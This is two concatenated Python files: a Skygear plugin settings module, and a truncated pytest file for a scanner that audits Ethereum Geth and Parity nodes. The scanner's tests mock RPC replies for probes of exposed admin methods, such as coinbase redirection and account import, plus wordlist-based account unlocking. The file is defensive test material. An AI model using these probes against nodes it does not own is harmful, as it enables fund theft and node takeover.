# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
from argparse import Namespace
from .parser import SettingsParser
from .module import _config_module, get_module
_parsers = {}
"""
`settings` is namespaced settings for plugins. Following is an example of how
a plugin developer can register settings and query back the value.
Declaring the required settings:
```
from skygear.settings import SettingsParser, add_parser
parser = SettingsParser('SKYGEAR_CMS')
parser.add_setting('prefix', default='cms')
parser.add_setting('static_assets_prefix', default='/static/:prefix/')
add_parser('cms', parser)
```
The settings module will read the environment and set the value. For example,
os.environ `SKYGEAR_CMS_PREFIX` will be available as follows:
```
from skygear.settings import settings
settings.cms.prefix
```
"""
settings = Namespace()
def add_parser(name, parser, parse_now=True):
"""
Add the specified SettingsParser. If parse_now is True (the default),
the parser is run immediately.
"""
global _parsers
if name in _parsers:
raise Exception("Parser \"{}\" already defined.", name)
_parsers[name] = parser
if parse_now:
_parse(name, parser)
def _parse(name, parser):
global settings
ns = getattr(settings, name, Namespace())
ns = parser.parse_settings(ns)
setattr(settings, name, ns)
def parse_all():
"""
Parse all settings.
"""
global _parsers
global settings
for name, parser in _parsers.items():
_parse(name, parser)
return settings
def config_module(name, *args, **kwargs):
"""
Try to config the already imported module on boot time. If the package is
not already imported in boot time, will try to import as normal package
and config it.
config_module will not import another copy of the module if it was already
loaded at boot time.
To config a module, the `includeme` function will be called and all
skygear lambda functions, database hooks, etc. are expected to be declared
in the `includeme` function as follows:
```
import skygear
def includeme(settings, *args, **kwargs):
@skygear.op('some:lambda')
def some_lambda_func():
return {
'success': True,
'message': 'Some message being returned'
}
@skygear.after_save('some_record', async_=True)
def some_record_after_save(record, original_record, db):
return {
'success': True
}
# other lambda functions
```
The `includeme` function will be called in the following cases:
1. The module is declared on Skygear Plugin Runner, i.e. execute
`py-skygear some_module`.
2. The module is configured in cloud code, i.e. user calls
`skygear.config('some_module')` in his cloud code.
When the `includeme` function is called, settings will be passed as an
argument.
"""
global settings
try:
module = get_module(name)
except NameError:
module = importlib.import_module(name)
_config_module(module, settings, *args, **kwargs)
__all__ = [
Namespace,
SettingsParser, settings,
config_module,
add_parser, parse_all
]
|
import uuid
from unittest.mock import Mock, patch
import pytest
import requests_mock
from teatime import Context, Issue, NodeType, Report, Severity
from teatime.plugins.eth1 import (
AccountCreation,
AccountUnlock,
GethAccountImport,
GethDatadir,
GethNodeInfo,
GethStartRPC,
GethStartWebsocket,
GethStopRPC,
GethStopWebsocket,
GethTxPoolInspection,
GethTxPoolStatus,
HashrateStatus,
MiningStatus,
NetworkListening,
NodeSync,
NodeVersion,
OpenAccounts,
ParityChangeCoinbase,
ParityChangeExtra,
ParityChangeTarget,
ParityDevLogs,
ParityDropPeers,
ParityGasCeiling,
ParityGasFloor,
ParityMinGasPrice,
ParitySyncMode,
ParityTxCeiling,
ParityTxPoolStatistics,
ParityUpgrade,
PeerCountStatus,
PeerlistLeak,
PeerlistManipulation,
SHA3Consistency,
TxPoolContent,
)
TARGET = "127.0.0.1:8545"
TEST_UUID = "e7a657e4-0691-477c-b840-5fce5930fb21"
TESTCASES = []
# AccountCreation
TESTCASES += [
pytest.param(
AccountCreation(test_password="pa$$w0rd"),
NodeType.PARITY,
(
{
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0xlolthisistotallyvalid",
},
},
),
["personal_newAccount"],
[
Issue(
uuid=TEST_UUID,
title="We managed to create a new account on your node",
description=(
"A new account can be generated on the node "
"itself using the personal_newAccount RPC call."
),
severity=Severity.MEDIUM,
raw_data="0xlolthisistotallyvalid",
)
],
id="AccountCreation parity issue logged",
),
pytest.param(
AccountCreation(test_password="pa$$w0rd"),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0xlolthisistotallyvalid",
},
},
),
["personal_newAccount"],
[
Issue(
uuid=TEST_UUID,
title="We managed to create a new account on your node",
description=(
"A new account can be generated on the node "
"itself using the personal_newAccount RPC call."
),
severity=Severity.MEDIUM,
raw_data="0xlolthisistotallyvalid",
)
],
id="AccountCreation geth issue logged",
),
pytest.param(
AccountCreation(test_password="pa$$w0rd"),
NodeType.GETH,
({"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},),
["personal_newAccount"],
[],
id="AccountCreation geth error present",
),
pytest.param(
AccountCreation(test_password="pa$$w0rd"),
NodeType.PARITY,
({"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},),
["personal_newAccount"],
[],
id="AccountCreation parity error present",
),
]
# GethDatadir
TESTCASES += [
pytest.param(
GethDatadir(),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
),
["admin_datadir"],
[],
id="GethDatadir geth unknown method",
),
pytest.param(
GethDatadir(),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "/home/ethismoney/.ethereum",
},
},
),
["admin_datadir"],
[
Issue(
uuid=TEST_UUID,
title="Admin datadir access",
description=(
"The datadir directory path can be "
"fetched using the admin_datadir RPC call."
),
severity=Severity.LOW,
raw_data="/home/ethismoney/.ethereum",
)
],
id="GethDatadir geth issue logged",
),
pytest.param(
GethDatadir(),
NodeType.PARITY,
[],
[],
[],
id="GethDatadir parity skipped",
),
]
# GethAccountImport
TESTCASES += [
pytest.param(
GethAccountImport(keydata="0x0", password="pa$$w0rd"),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0xlolthisistotallyvalid",
},
},
),
["personal_importRawKey"],
[
Issue(
uuid=TEST_UUID,
title="We managed to import an account on your node",
description=(
"A private key can be imported on the node to initialize an "
"account using the personal_importRawKey RPC call."
),
severity=Severity.MEDIUM,
raw_data="0xlolthisistotallyvalid",
)
],
id="GethAccountImport geth issue logged",
),
pytest.param(
GethAccountImport(keydata="0x0", password="pa$$w0rd"),
NodeType.PARITY,
[],
[],
[],
id="GethAccountImport parity skipped",
),
pytest.param(
GethAccountImport(keydata="0x0", password="pa$$w0rd"),
NodeType.GETH,
({"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},),
["personal_importRawKey"],
[],
id="GethAccountImport geth error present",
),
]
# AccountUnlock
TESTCASES += [
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
{
"status_code": 200,
"json": {"jsonrpc": "2.0", "id": 1, "result": True},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[
Issue(
uuid=TEST_UUID,
title="Weak password detected!",
description=(
"The account (0x06012c8cf97bead5deae237070f9587f8e7a266d) "
"is only protected by a weak password (test-password)"
),
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="AccountUnlock geth issue logged",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
{
"status_code": 200,
"json": {"jsonrpc": "2.0", "id": 1, "result": True},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[
Issue(
uuid=TEST_UUID,
title="Weak password detected!",
description=(
"The account (0x06012c8cf97bead5deae237070f9587f8e7a266d) "
"is only protected by a weak password (test-password)"
),
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="AccountUnlock parity issue logged",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": [],
},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock geth no accounts",
),
# TODO: Enable when better infura check in place
# pytest.param(
# AccountUnlock(infura_url="https://infura", wordlist=["test-password"], skip_below=100),
# NodeType.GETH,
# ({"status_code": 200, "json": {
# "jsonrpc": "2.0",
# "id": 1,
# "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
# }},{"status_code": 200, "json": {}},),
# ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
# [],
# id="AccountUnlock geth infura balance error",
# ),
pytest.param(
AccountUnlock(
infura_url="https://infura", wordlist=["test-password"], skip_below=100
),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock geth too little balance",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
{"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock geth unlock error",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock geth unlock not found",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": [],
},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock parity no accounts",
),
# TODO: Enable when better infura check in place
# pytest.param(
# AccountUnlock(infura_url="https://infura", wordlist=["test-password"], skip_below=100),
# NodeType.PARITY,
# ({"status_code": 200, "json": {
# "jsonrpc": "2.0",
# "id": 1,
# "result": [TEST_ADDR],
# }}, {"status_code": 200, "json": {}},),
# ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
# [],
# id="AccountUnlock parity infura balance error",
# ),
pytest.param(
AccountUnlock(
infura_url="https://infura", wordlist=["test-password"], skip_below=100
),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock parity too little balance",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
{"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock parity unlock error",
),
pytest.param(
AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
},
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
},
),
["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
[],
id="AccountUnlock parity unlock not found",
),
]
# OpenAccounts
TESTCASES += [
pytest.param(
OpenAccounts(infura_url="https://infura"),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"}},
),
["eth_accounts", "eth_getBalance"],
[
Issue(
uuid=TEST_UUID,
title="Found account",
description="Account: 0x06012c8cf97bead5deae237070f9587f8e7a266d Balance: 1",
severity=Severity.MEDIUM,
raw_data="0x06012c8cf97bead5deae237070f9587f8e7a266d",
)
],
id="OpenAccounts geth issue logged",
),
pytest.param(
OpenAccounts(infura_url="https://infura"),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
},
},
{"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"}},
),
["eth_accounts", "eth_getBalance"],
[
Issue(
uuid=TEST_UUID,
title="Found account",
description="Account: 0x06012c8cf97bead5deae237070f9587f8e7a266d Balance: 1",
severity=Severity.MEDIUM,
raw_data="0x06012c8cf97bead5deae237070f9587f8e7a266d",
)
],
id="OpenAccounts parity issue logged",
),
pytest.param(
OpenAccounts(infura_url="https://infura"),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": [],
},
},
),
["eth_accounts"],
[],
id="OpenAccounts geth no accounts",
),
# TODO: test error in infura
# pytest.param(
# OpenAccounts(infura_url="https://infura"),
# NodeType.GETH,
# (
# {"status_code": 200, "json": {
# "jsonrpc": "2.0",
# "id": 1,
# "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
# }},
# {
# "status_code": 200,
# "json": {
# "id": 1,
# "jsonrpc": "2.0",
# "error": {"message": "Method not found"},
# },
# },
# ),
# ["eth_accounts", "eth_getBalance"],
# [],
# id="OpenAccounts geth accounts not found",
# ),
pytest.param(
OpenAccounts(infura_url="https://infura"),
NodeType.PARITY,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": [],
},
},
),
["eth_accounts"],
[],
id="OpenAccounts parity no accounts",
),
# TODO: test error in infura
# pytest.param(
# OpenAccounts(infura_url="https://infura"),
# NodeType.PARITY,
# (
# {"status_code": 200, "json": {
# "jsonrpc": "2.0",
# "id": 1,
# "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
# }},
# {
# "status_code": 200,
# "json": {
# "id": 1,
# "jsonrpc": "2.0",
# "error": {"message": "Method not found"},
# },
# },
# ),
# ["eth_accounts", "eth_getBalance"],
# [],
# id="OpenAccounts parity accounts not found",
# ),
]
# GethNodeInfo
TESTCASES += [
pytest.param(
GethNodeInfo(),
NodeType.GETH,
(
{
"status_code": 200,
"json": {
"jsonrpc": "2.0",
"id": 1,
"result": {
"important": "stuff",
},
},
},
),
["admin_nodeInfo"],
[
Issue(
uuid=TEST_UUID,
title="Admin Node Info Leaks",
description="Admin-only information can be fetched using the admin_nodeInfo RPC "
"call.",
severity=Severity.LOW,
raw_data={"important": "stuff"},
)
],
id="GethNodeInfo issue logged",
),
pytest.param(
GethNodeInfo(),
NodeType.PARITY,
[],
[],
[],
id="GethNodeInfo parity skipped",
),
]
# ParityDevLogs
TESTCASES += [
pytest.param(
ParityDevLogs(),
NodeType.GETH,
[],
[],
[],
id="ParityDevLogs geth skipped",
),
pytest.param(
ParityDevLogs(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_devLogs"],
[],
id="ParityDevLogs error skipped",
),
pytest.param(
ParityDevLogs(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": ["important log stuff"]},
}
],
["parity_devLogs"],
[
Issue(
uuid=TEST_UUID,
title="Developer log information leak",
description="The node's developer logs can be fetched using the parity_devLogs "
"RPC call.",
severity=Severity.CRITICAL,
raw_data=["important log stuff"],
)
],
id="ParityDevLogs geth skipped",
),
]
# PeerlistLeak
TESTCASES += [
pytest.param(
PeerlistLeak(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "peer stuff"},
}
],
["parity_netPeers"],
[
Issue(
uuid=TEST_UUID,
title="Peer list information leak",
description="Admin-only peer list information can be fetched with the "
"parity_netPeers RPC call.",
severity=Severity.MEDIUM,
raw_data="peer stuff",
)
],
id="PeerlistLeak parity issue logged",
),
pytest.param(
PeerlistLeak(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": "peer stuff"},
}
],
["admin_peers"],
[
Issue(
uuid=TEST_UUID,
title="Admin Peerlist Access",
description="Admin-only information about the peer list can be fetched using the "
"admin_peers RPC call.",
severity=Severity.MEDIUM,
raw_data="peer stuff",
)
],
id="PeerlistLeak geth issue logged",
),
pytest.param(
PeerlistLeak(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["admin_peers"],
[],
id="PeerlistLeak geth error",
),
pytest.param(
PeerlistLeak(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_netPeers"],
[],
id="PeerlistLeak parity error",
),
pytest.param(
PeerlistLeak(),
NodeType.IPFS,
[],
[],
[],
id="PeerlistLeak unknown node error",
),
]
# ParityGasCeiling
TESTCASES += [
pytest.param(
ParityGasCeiling(gas_target=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": True},
}
],
["parity_setGasCeilTarget"],
[
Issue(
uuid=TEST_UUID,
title="Gas ceiling target can be changed",
description="Anyone can change the gas ceiling value using the "
"parity_setGasCeilTarget RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityGasCeiling parity issue logged",
),
pytest.param(
ParityGasCeiling(gas_target=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setGasCeilTarget"],
[],
id="ParityGasCeiling parity error",
),
pytest.param(
ParityGasCeiling(gas_target=1000),
NodeType.GETH,
[],
[],
[],
id="ParityGasCeiling geth skipped",
),
]
# ParityGasFloor
TESTCASES += [
pytest.param(
ParityGasFloor(gas_floor=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {"id": 1, "jsonrpc": "2.0", "result": True},
}
],
["parity_setGasFloorTarget"],
[
Issue(
uuid=TEST_UUID,
title="Gas floor target can be changed",
description="Anyone can change the gas floor value using the "
"parity_setGasFloorTarget RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityGasFloor parity issue logged",
),
pytest.param(
ParityGasFloor(gas_floor=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setGasFloorTarget"],
[],
id="ParityGasFloor parity error",
),
pytest.param(
ParityGasFloor(gas_floor=1000),
NodeType.GETH,
[],
[],
[],
id="ParityGasFloor geth skipped",
),
]
# ParityChangeCoinbase
TESTCASES += [
pytest.param(
ParityChangeCoinbase(author="0x0"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["parity_setAuthor"],
[
Issue(
uuid=TEST_UUID,
title="Coinbase address change possible",
description="Anyone can change the coinbase address and redirect miner payouts using the parity_setAuthor RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityChangeCoinbase parity issue logged",
),
pytest.param(
ParityChangeCoinbase(author="0x0"),
NodeType.GETH,
[],
[],
[],
id="ParityChangeCoinbase geth skipped",
),
pytest.param(
ParityChangeCoinbase(author="0x0"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setAuthor"],
[],
id="ParityChangeCoinbase parity error",
),
]
# ParityChangeTarget
TESTCASES += [
pytest.param(
ParityChangeTarget(target_chain="test"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["parity_setChain"],
[
Issue(
uuid=TEST_UUID,
title="Chain preset change possible",
description="Anyone can change the node's target chain value using the parity_setChain RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParityChangeTarget parity issue logged",
),
pytest.param(
ParityChangeTarget(target_chain="test"),
NodeType.GETH,
[],
[],
[],
id="ParityChangeTarget geth skipped",
),
pytest.param(
ParityChangeTarget(target_chain="test"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setChain"],
[],
id="ParityChangeTarget parity error",
),
]
# ParityChangeExtra
TESTCASES += [
pytest.param(
ParityChangeExtra(extra_data="pwn'd"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["parity_setExtraData"],
[
Issue(
uuid=TEST_UUID,
title="Extra data change possible",
description="Anyone can change the extra data attached to newly mined blocks using the parity_setExtraData RPC call.",
severity=Severity.LOW,
raw_data=True,
)
],
id="ParityChangeExtra parity issue logged",
),
pytest.param(
ParityChangeExtra(extra_data="pwn'd"),
NodeType.GETH,
[],
[],
[],
id="ParityChangeExtra geth skipped",
),
pytest.param(
ParityChangeExtra(extra_data="pwn'd"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setExtraData"],
[],
id="ParityChangeExtra parity error",
),
]
# ParitySyncMode
TESTCASES += [
pytest.param(
ParitySyncMode(mode="offline"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["parity_setMode"],
[
Issue(
uuid=TEST_UUID,
title="The sync mode can be changed",
description="Anyone can change the node's sync mode using the parity_setMode RPC call.",
severity=Severity.CRITICAL,
raw_data=True,
)
],
id="ParitySyncMode parity issue logged",
),
pytest.param(
ParitySyncMode(mode="offline"),
NodeType.GETH,
[],
[],
[],
id="ParitySyncMode geth skipped",
),
pytest.param(
ParitySyncMode(mode="offline"),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"error": {"message": "Method not found"},
},
}
],
["parity_setMode"],
[],
id="ParitySyncMode parity error",
),
]
# MiningStatus
TESTCASES += [
pytest.param(
MiningStatus(should_mine=True),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["eth_mining"],
[],
id="MiningStatus geth is and should be mining",
),
pytest.param(
MiningStatus(should_mine=False),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["eth_mining"],
[],
id="MiningStatus geth is not and should not be mining",
),
pytest.param(
MiningStatus(should_mine=False),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["eth_mining"],
[
Issue(
uuid=TEST_UUID,
title="Mining Status",
description="The node should not be mining but is",
severity=Severity.MEDIUM,
raw_data=True,
)
],
id="MiningStatus geth not mining but should be",
),
pytest.param(
MiningStatus(should_mine=True),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["eth_mining"],
[
Issue(
uuid=TEST_UUID,
title="Mining Status",
description="The node should be mining but isn't",
severity=Severity.MEDIUM,
raw_data=False,
)
],
id="MiningStatus geth should be mining but is not",
),
pytest.param(
MiningStatus(should_mine=True),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["eth_mining"],
[],
id="MiningStatus parity is and should be mining",
),
pytest.param(
MiningStatus(should_mine=False),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["eth_mining"],
[],
id="MiningStatus parity is not and should not be mining",
),
pytest.param(
MiningStatus(should_mine=False),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["eth_mining"],
[
Issue(
uuid=TEST_UUID,
title="Mining Status",
description="The node should not be mining but is",
severity=Severity.MEDIUM,
raw_data=True,
)
],
id="MiningStatus parity not mining but should be",
),
pytest.param(
MiningStatus(should_mine=True),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["eth_mining"],
[
Issue(
uuid=TEST_UUID,
title="Mining Status",
description="The node should be mining but isn't",
severity=Severity.MEDIUM,
raw_data=False,
)
],
id="MiningStatus parity should be mining but is not",
),
]
# HashrateStatus
TESTCASES += [
pytest.param(
HashrateStatus(expected_hashrate=1000),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x3e8",
},
}
],
["eth_hashrate"],
[],
id="HashrateStatus geth hashrate equals",
),
pytest.param(
HashrateStatus(expected_hashrate=100),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x3e8",
},
}
],
["eth_hashrate"],
[],
id="HashrateStatus geth hashrate larger",
),
pytest.param(
HashrateStatus(expected_hashrate=10000),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x3e8",
},
}
],
["eth_hashrate"],
[
Issue(
uuid=TEST_UUID,
title="Mining Hashrate Low",
description="The hashrate should be >= 10000 but only is 1000",
severity=Severity.MEDIUM,
raw_data=1000,
)
],
id="HashrateStatus geth hashrate smaller",
),
pytest.param(
HashrateStatus(expected_hashrate=1000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x3e8",
},
}
],
["eth_hashrate"],
[],
id="HashrateStatus parity hashrate equals",
),
pytest.param(
HashrateStatus(expected_hashrate=100),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x3e8",
},
}
],
["eth_hashrate"],
[],
id="HashrateStatus parity hashrate larger",
),
pytest.param(
HashrateStatus(expected_hashrate=10000),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x3e8",
},
}
],
["eth_hashrate"],
[
Issue(
uuid=TEST_UUID,
title="Mining Hashrate Low",
description="The hashrate should be >= 10000 but only is 1000",
severity=Severity.MEDIUM,
raw_data=1000,
)
],
id="HashrateStatus parity hashrate smaller",
),
]
# NetworkListening
TESTCASES += [
pytest.param(
NetworkListening(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["net_listening"],
[
Issue(
uuid=TEST_UUID,
title="Node not listening to peers",
description="The node is not listening to new peer requests",
severity=Severity.HIGH,
raw_data=False,
)
],
id="NetworkListening parity issue logged",
),
pytest.param(
NetworkListening(),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["net_listening"],
[],
id="NetworkListening parity no issue",
),
pytest.param(
NetworkListening(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": False,
},
}
],
["net_listening"],
[
Issue(
uuid=TEST_UUID,
title="Node not listening to peers",
description="The node is not listening to new peer requests",
severity=Severity.HIGH,
raw_data=False,
)
],
id="NetworkListening geth issue logged",
),
pytest.param(
NetworkListening(),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": True,
},
}
],
["net_listening"],
[],
id="NetworkListening geth no issue",
),
]
# PeerCountStatus
TESTCASES += [
pytest.param(
PeerCountStatus(minimum_peercount=2),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x2",
},
}
],
["net_peerCount"],
[],
id="PeerCountStatus geth peer count equals",
),
pytest.param(
PeerCountStatus(minimum_peercount=1),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x2",
},
}
],
["net_peerCount"],
[],
id="PeerCountStatus geth peer count larger",
),
pytest.param(
PeerCountStatus(minimum_peercount=10),
NodeType.GETH,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x2",
},
}
],
["net_peerCount"],
[
Issue(
uuid=TEST_UUID,
title="Number of peers too low!",
description="Too few peers (current < minimum): 2 < 10",
severity=Severity.MEDIUM,
raw_data=2,
)
],
id="PeerCountStatus geth peer count smaller",
),
pytest.param(
PeerCountStatus(minimum_peercount=2),
NodeType.PARITY,
[
{
"status_code": 200,
"json": {
"id": 1,
"jsonrpc": "2.0",
"result": "0x2",
},
}
],
["net_peerCount"],
[],
